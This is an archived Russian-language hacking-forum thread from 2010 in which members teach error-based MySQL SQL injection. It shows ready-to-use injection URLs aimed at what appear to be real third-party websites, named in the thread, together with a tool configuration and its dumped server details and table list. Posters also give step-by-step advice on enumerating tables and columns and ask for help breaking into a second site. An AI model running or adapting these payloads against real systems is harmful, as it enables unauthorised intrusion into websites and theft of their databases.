ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
03.04.2010, 20:31
|
|
Постоянный
Регистрация: 07.11.2007
Сообщений: 392
Провел на форуме:
1325167
Репутация:
100
|
|
Понял.
Тогда почему используется функция
(select(1)from(select+count(0),concat((select(vers ion())),floor(rand(0)*2 ))from(statpage)+group+by+2)a)--+
Кодирование это понятно, только почему в такой последовательности и "--+" - какое имеет значение для уязвимого запроса?
|
|
|
03.04.2010, 20:34
|
|
Постоянный
Регистрация: 15.03.2008
Сообщений: 441
Провел на форуме:
2052341
Репутация:
95
|
|
Ershik.
"--+" - плюсом "обрезают комментарий"
|
|
|
|
03.04.2010, 20:43
|
|
Постоянный
Регистрация: 07.11.2007
Сообщений: 392
Провел на форуме:
1325167
Репутация:
100
|
|
Понятно.
Я хочу выяснить наименование столбцов и полей.
По типу:
http://xxx/news.php?id=-1' UNION SELECT 1,2,3,TABLE_NAME ,5,6 FROM INFORMATION_SCHEMA.TABLES LIMIT 1,1 --
:
Произвожу иньекцию, подобно этой:
http://mihadmin.ru/statpage.php?sid=love'+and+(select(1)from(select+c ount(0),concat((select(TABLE_NAME)),floor(rand(0)* 2))from(statpage)+FROM
+INFORMATION_SCHEMA.TABLES+LIMIT+1,1)a)--+
Я не совсем понимаю механизм заключения все в concat и floor
Существует какой-то онлайн сервис или программа для преобразования?
Как с его помощью можно вытащить названия таблиц, полей?
|
|
|
|
03.04.2010, 21:06
|
|
Leaders of Antichat - Level 4
Регистрация: 02.06.2005
Сообщений: 1,411
Провел на форуме:
10605912
Репутация:
4693
|
|
Сообщение от Ershik
Я не совсем понимаю механизм заключения все в concat и floor
Существует какой-то онлайн сервис или программа для преобразования?
Как с его помощью можно вытащить названия таблиц, полей?
Посмотри тут пример: https://forum.antichat.ru/showpost.php?p=1802753&postcount=21
__________________
Я отдал бы немало за пару крыльев,
Я отдал бы немало за третий глаз
За руку на которой четырнадцать пальцев
Мне нужен для дыхания другой газ..
Мой блог: http://qwazar.ru/.
|
|
|
|
03.04.2010, 21:39
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
Сообщение от Qwazar
Посмотри тут пример: https://forum.antichat.ru/showpost.php?p=1802753&postcount=21
извиняюсь, не могли бы вы продемонстрировать метод из приведенной статьи на этом живом примере, который спросил ТС? Например для получения списка тех же таблиц из information_schema.tables
Последний раз редактировалось Pashkela; 03.04.2010 в 21:42..
|
|
|
|
03.04.2010, 22:02
|
|
Leaders of Antichat - Level 4
Регистрация: 02.06.2005
Сообщений: 1,411
Провел на форуме:
10605912
Репутация:
4693
|
|
Сообщение от Pashkela
извиняюсь, не могли бы вы продемонстрировать метод из приведенной статьи на этом живом примере, который спросил ТС? Например для получения списка тех же таблиц из information_schema.tables
Разумеется:
Код:
http://mihadmin.ru/statpage.php?sid=-1+and+(select*from(select+count(*)from(select+1+union+select+2+union+select+3)x+group+by concat(mid((select+TABLE_NAME+from+INFORMATION_SCHEMA.TABLES+limit+1,1),1,64),floor(rand(0)*2)))z)
И в самом верху вижу:
Duplicate entry 'COLLATIONS1' for key 1
З.Ы.
Ну а дальше меняем значение в лимите, сам запрос в mid(...).
__________________
Я отдал бы немало за пару крыльев,
Я отдал бы немало за третий глаз
За руку на которой четырнадцать пальцев
Мне нужен для дыхания другой газ..
Мой блог: http://qwazar.ru/.
Последний раз редактировалось Qwazar; 03.04.2010 в 22:06..
|
|
|
|
03.04.2010, 21:03
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
тыцк
Код:
$method = 0; # 1- Post; 0 - GET метод запросов | Post or Get method, 1-POST; 0-GET
$f_table = "statpage";
$f_url = "http://mihadmin.ru/statpage.php?sid=love'+and+(select(1)from"; # url
$f_plus = "+"; #
$f_filtr = "a)--+";
Код:
System information:
-----------------------------------------
ver:5.0.51a-24+lenny2
datadir:/var/lib/mysql/
os:debian-linux-gnu
base:mihadmin_main
basedir:/usr/
tmpdir:/tmp
-----------------------------------------
Tables in information_schema.tables - 27
-----------------------------------------
COLLATIONS
ROUTINES
SCHEMATA
SCHEMA_PRIVILEGES
STATISTICS
TABLES
article
const
group
group_refer
menu
rights
statpage
CHARACTER_SETS
COLLATION_CHARACTER_SET_APPLICABILITY
COLUMNS
COLUMN_PRIVILEGES
KEY_COLUMN_USAGE
PROFILING
TABLE_CONSTRAINTS
TABLE_PRIVILEGES
TRIGGERS
USER_PRIVILEGES
VIEWS
news
rights_refer
user
|
|
|
|
03.04.2010, 21:46
|
|
Постоянный
Регистрация: 07.11.2007
Сообщений: 392
Провел на форуме:
1325167
Репутация:
100
|
|
Поддерживаю.
Без примеров сложно вкуривается.))
|
|
|
|
03.04.2010, 22:06
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
2 Qwazar:
класс, спасибо
|
|
|
|
03.04.2010, 22:32
|
|
Banned
Регистрация: 14.06.2008
Сообщений: 34
Провел на форуме:
119183
Репутация:
13
|
|
http://www.gemreplica.com/about.php?cid=(select+1+from+(select+count(0),conc at((select+version()),floor(rand(0)*2))+from+produ cts+group+by+2+limit+1)a)
к сожалению не докрутил скуль в силу своей неопытности.
Господа обьясните как через эту ошибку можно вывести названия столбцов. Так не вышло:
http://www.gemreplica.com/about.php?cid=(select+1+from+(select+count(0),conc at((select+table_name),floor(rand(0)*2))+from+info rmation_schema.tables+group+by+2+limit+0,1)a
Последний раз редактировалось Darren; 03.04.2010 в 22:36..
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид